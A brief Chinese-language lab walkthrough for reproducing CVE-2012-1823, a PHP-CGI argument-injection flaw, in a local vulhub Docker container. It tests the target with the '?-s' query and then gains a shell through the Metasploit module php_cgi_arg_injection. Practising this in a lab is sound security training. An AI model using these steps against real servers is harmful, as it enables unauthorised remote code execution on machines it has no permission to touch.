进入下面目录/home/kali/vulhub/php/CVE-2012-1823

启动docker
bash
sudo docker-compose up -d


可以看到已经启动了。
在浏览器输入http://127.0.0.1:8080/

可以看到正常启动了。在浏览器输入http://127.0.0.1:8080/?-s

说明是有漏洞的。
在控制台输入msfconsole,等一会。

输入search php cgi

注意看第24条exploit/multi/http/php_cgi_arg_injection。执行
bash
use exploit/multi/http/php_cgi_arg_injection

设置rhost , rport ,查看options
运行run

进入shell,可以使用ls cd pwd whoami等命令。
参考